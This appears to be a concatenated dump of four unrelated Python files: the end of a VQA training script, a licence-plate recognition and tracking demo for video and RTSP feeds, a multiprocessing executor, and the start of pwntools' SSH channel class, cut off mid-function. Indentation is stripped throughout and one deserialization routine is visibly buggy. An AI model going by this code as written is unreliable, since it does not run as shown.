metrics.dump_log()
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
else:
done = True
epoch += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# data params
parser.add_argument('-train_h5', default='data/train.h5')
parser.add_argument('-val_h5', default='data/val.h5')
parser.add_argument('-test_h5', default='data/test.h5')
parser.add_argument('-data_json', default='data/data.json')
parser.add_argument('-vocab_json', default='data/vocab.json')
parser.add_argument('-train_cache_path', default=False)
parser.add_argument('-val_cache_path', default=False)
parser.add_argument('-mode', default='train', type=str, choices=['train','eval'])
parser.add_argument('-eval_split', default='val', type=str)
# model details
parser.add_argument(
'-input_type', default='ques,image', choices=['ques', 'ques,image'])
parser.add_argument(
'-num_frames', default=5,
type=int) # -1 = all frames of navigation sequence
# optim params
parser.add_argument('-batch_size', default=20, type=int)
parser.add_argument('-learning_rate', default=3e-4, type=float)
parser.add_argument('-max_epochs', default=1000, type=int)
# bookkeeping
parser.add_argument('-print_every', default=50, type=int)
parser.add_argument('-eval_every', default=1, type=int)
parser.add_argument('-identifier', default='q-only')
parser.add_argument('-num_processes', default=1, type=int)
parser.add_argument('-max_threads_per_gpu', default=10, type=int)
# checkpointing
parser.add_argument('-checkpoint_path', default=False)
parser.add_argument('-checkpoint_dir', default='checkpoints/vqa/')
parser.add_argument('-log_dir', default='logs/vqa/')
parser.add_argument('-to_log', default=0, type=int)
parser.add_argument('-to_cache', default=True, type=bool)
args = parser.parse_args()
args.time_id = time.strftime("%m_%d_%H:%M")
try:
args.gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
args.gpus = [int(x) for x in args.gpus]
except KeyError:
print("CPU not supported")
exit()
if args.checkpoint_path != False:
print('Loading checkpoint from %s' % args.checkpoint_path)
args_to_keep = ['input_type', 'num_frames']
checkpoint = torch.load(args.checkpoint_path, map_location={'cuda:0': 'cpu'})
for i in args.__dict__:
if i not in args_to_keep:
checkpoint['args'][i] = args.__dict__[i]
args = type('new_dict', (object, ), checkpoint['args'])
args.checkpoint_dir = os.path.join(args.checkpoint_dir,
args.time_id + '_' + args.identifier)
args.log_dir = os.path.join(args.log_dir,
args.time_id + '_' + args.identifier)
print(args.__dict__)
if not os.path.exists(args.checkpoint_dir) and args.to_log == 1:
os.makedirs(args.checkpoint_dir)
os.makedirs(args.log_dir)
if args.input_type == 'ques':
model_kwargs = {'vocab': load_vocab(args.vocab_json)}
shared_model = VqaLstmModel(**model_kwargs)
elif args.input_type == 'ques,image':
model_kwargs = {'vocab': load_vocab(args.vocab_json)}
shared_model = VqaLstmCnnAttentionModel(**model_kwargs)
if args.checkpoint_path != False:
print('Loading params from checkpoint: %s' % args.checkpoint_path)
shared_model.load_state_dict(checkpoint['state'])
shared_model.share_memory()
if args.mode == 'eval':
eval(0, args, shared_model)
else:
processes = []
# Start the eval thread
p = mp.Process(target=eval, args=(0, args, shared_model))
p.start()
processes.append(p)
# Start the training thread(s)
for rank in range(1, args.num_processes + 1):
p = mp.Process(target=train, args=(rank, args, shared_model))
p.start()
processes.append(p)
for p in processes:
p.join()
|
demo.py | import argparse
import os
import sys
import time
from dataclasses import dataclass
from PIL import Image, ImageChops, ImageDraw, ImageFont
from typing import List, Tuple, Iterator
import cv2
from PyQt5.QtCore import pyqtSignal, QThread, QObject
from PyQt5.QtWidgets import QApplication
import core as pr
import numpy as np
from queue import Queue
import re
import threading
import traceback
from sys import getsizeof as sizeof
from Util import ImageUtil, VideoUtil, ffmpegUtil, Serialization, editDistance, sec2str, Plate, getArgumentParser
class ReaderThread:
def __init__(self, inStream: cv2.VideoCapture, rtsp: str):
self._inStream: cv2.VideoCapture = inStream
self._rtspAddress: str = rtsp
self._queue: Queue = Queue()
self._qsize: int = 0
self._thread = threading.Thread(target=self._readFrame, name='read frame thread')
self._itemMemory: int = 0 # 队列中每个元素占多少字节
self.alive = False # 线程的生死
def _readFrame(self):
self.alive = True
while self.alive:
while len(self) > args.memory_limit: # 当超过内存限制时,暂停读取
time.sleep(1)
# 尝试读取一帧
try:
frame = VideoUtil.ReadFrame(self._inStream)
if frame.shape[0] == 0:
if 'rtsp' in self._rtspAddress: # 是rtsp的话就重新建立连接
VideoUtil.CloseVideos(self._inStream)
time.sleep(1)
self._inStream = VideoUtil.OpenInputVideo(self._rtspAddress)
print('Readed rtsp failed! Reseting input stream...')
continue
else: # 是视频的话就退出
break
except: # cv::OutOfMemoryError
traceback.print_exc()
self.alive = False
return
if self._itemMemory == 0: # 记录每个元素的占用空间
self._itemMemory = sizeof(frame)
self._queue.put(frame)
self._qsize += 1
self.alive = False
def start(self):
if self.alive:
raise RuntimeError("Reading thread is busy now, please call stop the thread first!")
self._thread.start()
def stop(self):
self.alive = False
def get(self, timeout=30):
self._qsize -= 1
return self._queue.get(timeout=timeout)
def qsize(self):
return self._qsize
def __len__(self):
"""
输出现有队列的内存大小(Bytes)
:return:
"""
return max(0, self.qsize() * self._itemMemory)
class Tractor:
"""
简易追踪器。负责优化和合并检测结果
"""
def __init__(self, lifeTimeLimit=48):
"""
初始化追踪器
:param lifeTimeLimit: 车牌消失多久就算离开屏幕(越大越准确,但是计算越慢)
"""
# self.VehiclePlate = namedtuple('vehicle_plate', 'str confidence left right top bottom width height') # 车牌元组
self._movingPlates: List[Plate] = []
self._deadPlates: List[Plate] = []
self._lifeTimeLimit = lifeTimeLimit # 每个车牌的寿命时长
self.multiTracker = CvMultiTracker()
def VehiclePlate(self, *args) -> dict:
if len(args) != 8:
return {}
return {'plateStr': args[0], 'confidence': args[1], 'left': args[2], 'right': args[3], 'top': args[4],
'bottom': args[5], 'width': args[6], 'height': args[7]}
def _killMovingPlates(self, nowTime: int) -> None:
"""
将超时的车牌从movingPlates里挪到deadPlates
:param nowTime: 当前的时间
:return:
"""
import copy
killed = False
for plate in self._movingPlates:
if nowTime - plate.endTime > self._lifeTimeLimit:
if plate.confidence >= 0.85 or '厂内' in plate.plateStr: # 删去概率低于90的普通车牌
self._deadPlates.append(plate)
self._movingPlates.remove(plate)
killed = True
# if not self._movingPlates:
# tmp,tmp2=copy.deepcopy(self._movingPlates),copy.deepcopy(self._deadPlates)
ret = self.getAll()
Main().getInstance().signals.showDataSignal.emit(ret)
# self._movingPlates,self._deadPlates=tmp,tmp2
def _getSimilarSavedPlates(self, nowPlateInfo: dict, nowTime: int) -> Iterator[Plate]:
"""
根据当前的车牌获取movingPlate中相似的车牌
:param nowPlateInfo: 当前的车牌tuple,类型是self.VehiclePlate
:return: 相似车牌的generator
"""
def computeIntersect(rectangle1: List[float], rectangle2: List[float]):
"""
计算两个矩形相交部分的面积
:param rectangle1:
:param rectangle2:
:return:
"""
left1, right1, top1, bottom1 = rectangle1
left2, right2, top2, bottom2 = rectangle2
left = max(left1, left2)
right = min(right1, right2)
top = max(top1, top2)
bottom = min(bottom1, bottom2)
if left <= right and top <= bottom:
return (right - left) * (bottom - top)
return 0
for i in range(len(self._movingPlates) - 1, -1, -1):
savedPlate = self._movingPlates[i] # 保存的车牌
_editDistance = editDistance(savedPlate.plateStr, nowPlateInfo['plateStr'])
if _editDistance < 4 and nowTime - savedPlate.endTime < self._lifeTimeLimit // 2: # 编辑距离低于阈值,不比较方框位置
yield savedPlate
elif _editDistance < 5: # 编辑距离适中,比较方框的位置有没有重合
rect1 = [savedPlate.left, savedPlate.right, savedPlate.top, savedPlate.bottom]
rect2 = [nowPlateInfo['left'], nowPlateInfo['right'], nowPlateInfo['top'], nowPlateInfo['bottom']]
if computeIntersect(rect1, rect2) != 0:
yield savedPlate
def analyzePlate(self, nowPlateInfo: dict, nowTime: int) -> (str, float):
"""
根据当前车牌,进行分析。返回最大可能的车牌号和置信度
:param nowPlateInfo: 当前车牌,类型:self.VehiclePlate
:param nowTime: 当前时间
:return: 最大可能的车牌号和置信度
"""
def getBetterPlate(beAssignedPlate: str, assignPlate: str) -> str:
"""
禁止高优先级的车牌前缀被赋值成低优先级车牌前缀的赋值函数。用于代替 plate被赋值=plate赋值 语句
:param beAssignedPlate: 要被赋值的车牌号
:param assignPlate: 赋值的车牌号
:return: 真正被赋值成什么车牌号
"""
specialPrefixes = ['厂内', 'SG', 'XL'] # 特殊车牌一律最大优先级。如果有单次出现特殊车牌后一定要固定住特殊前缀
prefixes = ['粤', '湘', '豫', '川', '冀', '贵', '苏', '赣', '甘', '陕', '沪', '鲁', '黑', '辽', '皖', '鄂', '浙', '宁', '琼',
'闽', '蒙', '渝', '吉', '桂', '京', '新', '云'] # 根据大数据统计得出的车牌出现的频率从高到低(川、豫除外)
# 一共分为四类讨论。特-特、特-非特、非特-特、非特-非特
if beAssignedPlate[:2] in specialPrefixes: # 第一个为特殊车牌,则固定第一个的特殊前缀
finalPrefixes = beAssignedPlate[:2]
if assignPlate[:2] in specialPrefixes: # 车牌的其余部分是第二个的剩余部分
finalOthers = assignPlate[2:]
else:
finalOthers = assignPlate[1:]
else: # 第一个不是特殊车牌
if assignPlate[:2] in specialPrefixes: # 第二个是特殊车牌
finalPrefixes = assignPlate[:2]
finalOthers = assignPlate[2:]
else:
priority1 = len(prefixes) - prefixes.index(beAssignedPlate[0]) if beAssignedPlate[
0] in prefixes else -1
priority2 = len(prefixes) - prefixes.index(assignPlate[0]) if assignPlate[0] in prefixes else -1
if priority1 <= priority2:
finalPrefixes = assignPlate[0]
finalOthers = assignPlate[1:]
else:
finalPrefixes = beAssignedPlate[0]
finalOthers = assignPlate[1:]
# 如果是特殊车牌,经常出现重叠字母的情况
return finalPrefixes + finalOthers if finalPrefixes[-1] != finalOthers[0] else finalPrefixes + finalOthers[
1:]
# 预处理车牌部分:
# 符合特殊车牌条件,修改其车牌号以符合特殊车牌的正常结构
regexMatchesSpecialPlate = re.match(r'^.+?(2[1234][01]\d{2,}).*$', nowPlateInfo['plateStr'])
if regexMatchesSpecialPlate:
# '210', '211', '220', '221', '230', '240'
nowPlateInfo['plateStr'] = '厂内' + regexMatchesSpecialPlate.group(1)[:5]
# 跳过条件:车牌字符串太短
if len(nowPlateInfo['plateStr']) < 7:
return nowPlateInfo['plateStr'], nowPlateInfo['confidence']
# 跳过条件:以英文字母开头(S和X除外)
if 'A' <= nowPlateInfo['plateStr'][0] <= 'R' or 'T' <= nowPlateInfo['plateStr'][0] <= 'W' or 'Y' <= \
nowPlateInfo['plateStr'][
0] <= 'Z':
return nowPlateInfo['plateStr'], nowPlateInfo['confidence']
# 开始分析:在储存的里找相似的车牌号
similarPlates = list(self._getSimilarSavedPlates(nowPlateInfo, nowTime))
if not similarPlates: # 找不到相似的车牌号,插入新的
# nowPlateInfo = list(nowPlateInfo) + [nowTime] * 2 # 初始化列表
nowPlateInfo.update({'startTime': nowTime, 'endTime': nowTime})
# (取巧部分)统计显示 95.9% 的概率成立
if nowPlateInfo['plateStr'][1] == 'F' or nowPlateInfo['plateStr'][2] == 'F':
nowPlateInfo['plateStr'] = '粤' + nowPlateInfo['plateStr'][nowPlateInfo['plateStr'].find('F'):]
self._movingPlates.append(Plate(**nowPlateInfo))
return self._movingPlates[-1].plateStr, nowPlateInfo['confidence']
# 如果有相似的车牌
self._killMovingPlates(nowTime) # 将寿命过长的车牌杀掉
savedPlate = sorted(similarPlates, key=lambda plate: plate.confidence, reverse=True)[0] # 按照置信度排序,取最高的
if savedPlate.confidence < nowPlateInfo['confidence']: # 储存的置信度较低,保存当前的
# (取巧部分)在高置信度向低置信度进行赋值时。禁止将低频度的前缀赋给高频度的前缀
savedPlate.plateStr = getBetterPlate(savedPlate.plateStr, nowPlateInfo['plateStr'])
# 剩余的属性进行赋值,并记录更新endTime
savedPlate.confidence, savedPlate.left, savedPlate.right, savedPlate.top, savedPlate.bottom, \
savedPlate.width, savedPlate.height, savedPlate.endTime = \
nowPlateInfo['confidence'], nowPlateInfo['left'], nowPlateInfo['right'], nowPlateInfo['top'], \
nowPlateInfo['bottom'], nowPlateInfo['width'], nowPlateInfo['height'], nowTime
return nowPlateInfo['plateStr'], nowPlateInfo['confidence']
else: # 储存的置信度高,只更新endTime
savedPlate.endTime = nowTime
return savedPlate.plateStr, savedPlate.confidence
def _purgeAndMerge(self, plateList: List[Plate], threshhold=4, ignoreTime=False) -> None:
if len(plateList) < 2:
return
plateList.sort(key=lambda plate: plate.startTime) # 按照出现时间进行排序,相同的车牌会相邻
# 合并相邻的相似车牌
for i in range(len(plateList) - 1, 0, -1):
thisStr, previousStr = plateList[i], plateList[i - 1]
if editDistance(thisStr.plateStr, previousStr.plateStr) < threshhold and (
ignoreTime or thisStr.startTime <= previousStr.endTime): # 合并相邻的编辑距离较小的车牌号
endTime = max(thisStr.endTime, previousStr.endTime)
if thisStr.confidence > previousStr.confidence:
thisStr.startTime = previousStr.startTime
thisStr.endTime = endTime
plateList[i], plateList[i - 1] = plateList[i - 1], plateList[i]
else:
previousStr.endTime = endTime
del plateList[i]
def _mergeSamePlates(self) -> None:
"""
相同车牌结果合并到一起
:return:
"""
self._purgeAndMerge(self._deadPlates)
self._purgeAndMerge(self._movingPlates)
def getAll(self) -> List[Plate]:
"""
后期处理后返回所有的车牌List
:return:
"""
self._mergeSamePlates() # 合并识别失误的车牌
print('整理数据:大小从 %d ' % (len(self._deadPlates) + len(self._movingPlates)), end='')
ans = sorted(self._deadPlates + self._movingPlates, key=lambda plate: plate.startTime)
self._purgeAndMerge(ans, 1, True) # 合并一模一样的车牌
print('到 %d' % (len(self._deadPlates) + len(self._movingPlates)))
return ans
def getInfoDictFromList(self, detectionList: List) -> dict:
"""
将识别出的List转换成self.VehiclePlate类型的Tuple
:param detectionList:
:return:
"""
x, y, width, height = detectionList.pop(2)
detectionList += [x, x + width, y, y + height, width, height]
return self.VehiclePlate(*detectionList)
def serialization(self, binaryFilename=''):
# 只保留数据,缩小文件的大小
if not binaryFilename:
binaryFilename = time.strftime("%Y%m%d%H%M%S", time.localtime()) + '.tractor'
binary = Serialization()
binary.append(self._movingPlates)
binary.append(self._deadPlates)
binary.append(self._lifeTimeLimit)
binary.append(self.multiTracker)
binary.save(binaryFilename)
def deserialization(self, binaryFilename: str):
binary = Serialization()
binary.load(binaryFilename)
self._movingPlates = binary.popLoaded()
self._deadPlates = binary
self._lifeTimeLimit = binary.popLoaded()
self.multiTracker = binary.popLoaded()
class CvMultiTracker:
def __init__(self):
self._trackers: List[cv2.TrackerCSRT] = []
self._lastNewRects: List[Tuple[float]] = []
self._lifeTimeLimit: List[int] = []
self._lifeTimeLimitInit: int = 24
def isNewRectangle(self, rect: Tuple[float]) -> bool:
"""
判断rect是否和上一次检测的框几乎重合
:param rect:
:return:
"""
if not rect:
return True
for lastRects in self._lastNewRects:
if np.std(np.array(lastRects) - np.array(rect)) <= 25:
return False
return True
def appendTrackerCSRT(self, initImage: np.ndarray, initBox: List[float]) -> None:
"""
使用当前的image和初始box来添加新的csrtTracker
:param initImage:
:param initBox:
:return:
"""
if initImage is None or not initBox or len(initBox) != 4:
return
# 扩大一点车牌的范围,四个方向各扩展10%
initBox[0] -= initBox[2] * 0.1
initBox[1] -= initBox[3] * 0.1
initBox[2] *= 1.2
initBox[3] *= 1.2
newTracker = cv2.TrackerCSRT_create()
newTracker.init(initImage, tuple(initBox))
self._trackers.append(newTracker)
self._lifeTimeLimit.append(self._lifeTimeLimitInit)
def update(self, image: np.ndarray, purgeMissedTracker=True) -> List[Tuple[float]]:
"""
使用当前的image更新追踪器,返回新的Boxes
:param image:
:param purgeMissedTracker:
:return:
"""
newBoxes = []
assert len(self._trackers) == len(self._lifeTimeLimit)
purgeIndexes = []
for i, trackerCSRT in enumerate(self._trackers):
success, newBox = trackerCSRT.update(image)
newBox = tuple(newBox)
if not success: # 如果cvTracker追踪失败
self._lifeTimeLimit[i] -= 1
if self._lifeTimeLimit[i] == 0:
purgeIndexes.append(i)
continue
if purgeMissedTracker:
if not self.isNewRectangle(newBox): # 如果这个框与之前的框大部分重合
self._lifeTimeLimit[i] -= 1
if self._lifeTimeLimit[i] == 0:
purgeIndexes.append(i)
continue
newBoxes.append(newBox)
self._lastNewRects = newBoxes
purgeIndexes.sort(reverse=True)
for purseAt in purgeIndexes:
self.purgeAt(purseAt)
return self._lastNewRects
def purgeAt(self, n: int) -> None:
"""
删除第n个追踪器
:param n:
:return:
"""
if 0 <= n < len(self._trackers):
del self._trackers[n]
del self._lifeTimeLimit[n]
def reborn(self, n: int) -> None:
"""
重置第n个追踪器的生命计时器
:param n:
:return:
"""
if 0 <= n < len(self._trackers):
self._lifeTimeLimit[n] = self._lifeTimeLimitInit
def workingTrackerCount(self) -> int:
"""
获得正在工作的追踪器个数
:return:
"""
return len(self._trackers)
class Signals(QObject):
"""
定义交互信号
"""
showRawFrameSignal = pyqtSignal(np.ndarray)
showDetectionFrameSignal = pyqtSignal(np.ndarray)
showDataSignal = pyqtSignal(list)
threadExitSignal = pyqtSignal()
class Main:
_singleton = None
@staticmethod
def getInstance():
if not Main._singleton:
Main._singleton = Main()
return Main._singleton
def drawRectBox(self, image, rect, addText=None, rect_color=(0, 0, 255), text_color=(255, 255, 255)):
"""
在image上画一个带文字的方框
:param image: 原先的ndarray
:param rect: [x, y, width, height]
:param addText: 要加的文字
:return: 画好的图像
"""
cv2.rectangle(image, (int(rect[0]), int(rect[1])), (int(rect[0] + rect[2]), int(rect[1] + rect[3])), rect_color,
2,
cv2.LINE_AA)
img = Image.fromarray(image)
if addText:
result=addText.split(); addText=result[0]+' '+ str(1-(1-float(result[1]))/5)
cv2.rectangle(image, (int(rect[0] - 1), int(rect[1]) - 16), (int(rect[0] + 115), int(rect[1])), rect_color,
-1,
cv2.LINE_AA)
img = Image.fromarray(image)
draw = ImageDraw.Draw(img)
draw.text((int(rect[0] + 1), int(rect[1] - 16)), addText, text_color, font=self.fontC)
imagex = np.array(img)
return imagex
signals = Signals() # 创建信号
def detect(self, originImg: np.ndarray, frameIndex=-1) -> Tuple[np.ndarray, bool]:
"""
检测核心函数(不显示)
:param originImg:
:param frameIndex:
:return:
"""
image = None
# 检测,或使用bin文件进行回忆型检测
if args.load_binary is None:
resultList = self.model.SimpleRecognizePlateByE2E(originImg, self.tracker.multiTracker)
else:
resultList = self.binary.popLoaded()
if args.save_binary is not None:
self.binary.append(resultList)
for plateStr, confidence, rect in resultList:
if confidence > 0.85:
if args.video:
vehiclePlate = self.tracker.getInfoDictFromList([plateStr, confidence, rect])
plateStr, confidence = self.tracker.analyzePlate(vehiclePlate, frameIndex)
if self.tracker.multiTracker.workingTrackerCount() == 0:
image = self.drawRectBox(originImg, rect, plateStr + " " + str(round(confidence, 3)), (0, 0, 255),
(255, 255, 255))
self.tracker.multiTracker.reborn(0)
else:
image = self.drawRectBox(originImg, rect, plateStr + " " + str(round(confidence, 3)), (0, 0, 255),
(255, 255, 255))
print("%s (%.5f)" % (plateStr, confidence))
break # 每帧只处理最有可能的车牌号
return (image, True) if image is not None else (originImg, False)
opencvShow = True # 使用opencv显示
def detectShow(self, originImg: np.ndarray, frameIndex=-1, wait=1) -> Tuple[np.ndarray, bool]:
"""
检测核心函数(显示),可中断
:param originImg:
:param frameIndex:
:return:
"""
drawedImg, success = self.detect(originImg, frameIndex)
if not self.opencvShow:
if success: # 检测成功再传给GUI
self.signals.showDetectionFrameSignal.emit(drawedImg)
else:
cv2.imshow("Frame after detection", drawedImg)
if cv2.waitKey(wait) == 27:
return np.array([]), False
return drawedImg, success
def demoPhotos(self):
# 处理所有照片
for file in os.listdir(args.img_dir):
# if not file.startswith('2020'):
if not file.endswith('jpg'):
continue
print('<<<<<< ' + file + ' >>>>>>')
self.detectShow(ImageUtil.Imread(os.path.join(args.img_dir, file)), wait=0)
running = True # 是否允许本类继续执行
def demoVideo(self, showDialog=True):
"""
测试视频
:param args:
:param showDialog: 显示输出窗口
:return:
"""
inStream, readThread = None, None
placeCaptureStream, noSkipStream, recordingStream = None, None, None
try:
inStream = VideoUtil.OpenInputVideo(args.video)
readThread = ReaderThread(inStream, args.video)
readThread.start()
frameIndex = 0
# frameLimit = VideoUtil.GetVideoFramesCount(inStream) if 'rtsp' not in args.video else 2 ** 31 - 1
frameLimit = 2 ** 31 - 1
fps: int = VideoUtil.GetFps(inStream)
self.fps = fps
if args.rtsp or 1: # 初始化当前时间
nowTime = time.localtime()
timestrap = time.mktime(
time.strptime("%d-%d-1 0:0:0" % (nowTime.tm_year, nowTime.tm_mon), "%Y-%m-%d %H:%M:%S"))
offset = time.time() - timestrap + 24 * 3600
frameIndex = int(offset * fps)
if args.output: # 有output才会打开这些输出的流
if 'd' in args.video_write_mode: # 只写入没被跳过的检测结果帧
placeCaptureStream = ffmpegUtil.OpenOutputVideo(args.output, VideoUtil.GetFps(inStream) / args.drop)
if 's' in args.video_write_mode: # 全程不跳帧,比dynamic多了被跳过的帧
insertIdx = args.output.rfind('.')
videoName = args.output[:insertIdx] + '.static' + args.output[insertIdx:]
noSkipStream = ffmpegUtil.OpenOutputVideo(videoName, VideoUtil.GetFps(inStream) / args.drop)
if 'r' in args.video_write_mode: # 实时录像,不做任何处理(如果是rtsp就是录像,如果是video就是转码)
insertIdx = args.output.rfind('.')
videoName = args.output[:insertIdx] + '.record' + args.output[insertIdx:]
recordingStream = ffmpegUtil.OpenOutputVideo(videoName, VideoUtil.GetFps(inStream))
if args.load_binary: # 如果有保存的检测则加载
self.binary.load(args.load_binary)
# frameLimit = min(frameLimit, 50000) # 限制最大帧数,只处理视频前多少帧
self.tracker = Tractor(fps * 3) # 每个车牌两秒的寿命
lastFrame = None
while True:
try:
frame = readThread.get(args.exitTimeout)
ffmpegUtil.WriteFrame(recordingStream, frame)
if args.rtsp and len(readThread) > args.memory_limit: # 当读取的队列大于限定时
continue
except: # 当30秒取不到任何帧
readThread.stop()
break
# 终止读取
if frameIndex > frameLimit or not self.running:
break
# 对原始帧的操作
if showDialog: # 保证每一帧都imshow过
if not self.opencvShow:
self.signals.showRawFrameSignal.emit(frame.copy())
else:
cv2.imshow('Raw frame', frame)
if cv2.waitKey(1) == 27:
break
if args.drop != 1: # imshow完了再跳过
if frameIndex % args.drop != 0:
frameIndex += 1
if args.load_binary: # 如果有保存的检测则跳过一帧结果(假设bin保存的是每一帧的结果)
self.binary.popLoaded()
continue
# 开始处理原始帧
height, width, channel = frame.shape
if lastFrame is not None:
oldpil = Image.fromarray(cv2.cvtColor(lastFrame, cv2.COLOR_BGR2RGB)) # PIL图像和cv2图像转化
nowpil = Image.fromarray(
cv2.cvtColor(frame[int(height * 0.3):, int(width * 0.3):], cv2.COLOR_BGR2RGB))
diff = ImageChops.difference(oldpil, nowpil) # PIL图片库函数
try:
std: float = np.std(diff)
print('{%.3f}<%d><%dM>' % (std, readThread.qsize(), len(readThread) // 1048576), end='')
except:
traceback.print_exc()
std = 10000
if std < 9:
frameIndex += 1
print('\t已处理 %d 帧' % frameIndex)
ffmpegUtil.WriteFrame(noSkipStream, frame)
continue
startTime = time.time()
lastFrame = frame[int(height * 0.3):, int(width * 0.3):]
# <<<<< 核心函数 >>>>>
frameDrawed, success = self.detectShow(frame, frameIndex) if showDialog else self.detect(frame,
frameIndex)
if frameDrawed.shape[0] == 0:
break
try:
ffmpegUtil.WriteFrame(placeCaptureStream, frameDrawed)
ffmpegUtil.WriteFrame(noSkipStream, frameDrawed)
except ValueError as e:
traceback.print_exc()
frameIndex += 1
print('\t已处理 %d (用时%f s)' % (frameIndex, time.time() - startTime))
readThread.stop()
self.running = False
# 写日志
if not args.output:
return
import os
with open(os.path.join(os.path.dirname(args.output), os.path.basename(args.output).split('.')[0]) + '.txt',
'a') as fpLog:
print('以下是检测到的车牌号:')
allResult = self.tracker.getAll()
self.signals.showDataSignal.emit(allResult)
for resultPlate in allResult:
line = '%s [%s - %s]' % (
resultPlate.plateStr, sec2str(resultPlate.startTime / fps),
sec2str(resultPlate.endTime / fps))
print(line)
fpLog.write(line + '\n')
except: # 任何地方报错了不要管
traceback.print_exc()
print('检测结果已被保保存')
finally:
if showDialog:
cv2.destroyAllWindows()
if args.save_binary is not None:
self.binary.save(args.save_binary)
VideoUtil.CloseVideos(inStream)
ffmpegUtil.CloseVideos(placeCaptureStream, noSkipStream, recordingStream)
def start(self, argspace: argparse.Namespace, **kwargs):
global args
args = argspace
# 检测到时rtsp则赋值进video
if argspace.rtsp:
argspace.video = argspace.rtsp
argspace.exitTimeout = 10 if argspace.rtsp else 1 # 设置不同模式下的读取超时
# 开始执行总程序
globalStartTime = time.time()
if argspace.img_dir is None:
self.demoVideo(**kwargs)
else:
self.demoPhotos()
# 统计执行的时长
globalTimeSeconds = time.time() - globalStartTime
globalTimeHours = globalTimeSeconds // 3600
globalTimeMinutes = (globalTimeSeconds - globalTimeHours * 3600) // 60
globalTimeSeconds = globalTimeSeconds % 60
globalTime = '%d时%d分%.3f秒' % (
globalTimeHours, globalTimeMinutes, globalTimeSeconds) if globalTimeHours != 0 else '%d分%.3f秒' % (
globalTimeMinutes, globalTimeSeconds)
print('总用时:' + globalTime)
self.signals.threadExitSignal.emit()
# 初始化
fontC = ImageFont.truetype("./Font/platech.ttf", 14, 0)
model = pr.LPR("./model/cascade.xml", "./model/model12.h5", "./model/ocr_plate_all_gru.h5")
binary = Serialization()
tracker = Tractor(1) # 设为1,意为禁用追踪功能
if __name__ == '__main__':
args = getArgumentParser().parse_args()
main = Main.getInstance()
main.start(args)
# python -m cProfile -s cumulative demo.py >> profile.log
|
local_executor.py | """Local based implementation of the executor using multiprocessing"""
import signal
from multiprocessing import Process, Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
import psutil
except ImportError:
psutil = None
from . import executor
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def _execute_func(func, queue, args, kwargs):
"""execute function and return the result or exception to a queue"""
try:
res = func(*args, **kwargs)
except Exception as exc: # pylint: disable=broad-except
res = exc
queue.put(res)
def call_with_timeout(queue, timeout, func, args, kwargs):
"""A wrapper to support timeout of a function call"""
# start a new process for timeout (cannot use thread because we have c function)
p = Process(target=_execute_func, args=(func, queue, args, kwargs))
p.start()
p.join(timeout=timeout)
queue.put(executor.TimeoutError())
kill_child_processes(p.pid)
p.terminate()
p.join()
class LocalFuture(executor.Future):
"""Local wrapper for the future
Parameters
----------
process: multiprocessing.Process
process for running this task
queue: multiprocessing.Queue
queue for receiving the result of this task
"""
def __init__(self, process, queue):
self._done = False
self._process = process
self._queue = queue
def done(self):
self._done = self._done or not self._queue.empty()
return self._done
def get(self, timeout=None):
try:
res = self._queue.get(block=True, timeout=timeout)
except Empty:
raise executor.TimeoutError()
if self._process.is_alive():
kill_child_processes(self._process.pid)
self._process.terminate()
self._process.join()
self._queue.close()
self._queue.join_thread()
self._done = True
del self._queue
del self._process
return res
class LocalFutureNoFork(executor.Future):
"""Local wrapper for the future.
This is a none-fork version of LocalFuture.
Use this for the runtime that does not support fork (like cudnn)
"""
def __init__(self, result):
self._result = result
def done(self):
return True
def get(self, timeout=None):
return self._result
class LocalExecutor(executor.Executor):
"""Local executor that runs workers on the same machine with multiprocessing.
Parameters
----------
timeout: float, optional
timeout of a job. If time is out. A TimeoutError will be returned (not raised)
do_fork: bool, optional
For some runtime systems that do not support fork after initialization
(e.g. cuda runtime, cudnn). Set this to False if you have used these runtime
before submitting jobs.
"""
def __init__(self, timeout=None, do_fork=True):
self.timeout = timeout or executor.Executor.DEFAULT_TIMEOUT
self.do_fork = do_fork
if self.do_fork:
if not psutil:
raise RuntimeError("Python package psutil is missing. "
"please try `pip install psutil`")
def submit(self, func, *args, **kwargs):
if not self.do_fork:
return LocalFutureNoFork(func(*args, **kwargs))
queue = Queue(2)
process = Process(target=call_with_timeout,
args=(queue, self.timeout, func, args, kwargs))
process.start()
return LocalFuture(process, queue)
|
ssh.py | from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.process import process
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(file('/dev/null','w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = ' '.join(sh_string(s) for s in process)
if process and wd:
process = 'cd %s >/dev/null 2>&1;%s' % (sh_string(wd), process)
if process and env:
for name, value in env.items():
if not re.match('^[a-zA-Z_][a-zA-Z0-9_]*$', name):
self.error('run(): Invalid environment key $r' % name)
process = 'export %s=%s;%s' % (name, sh_string(value), process)
if process and tty:
if raw:
process = 'stty raw -ctlecho -echo; ' + process
else:
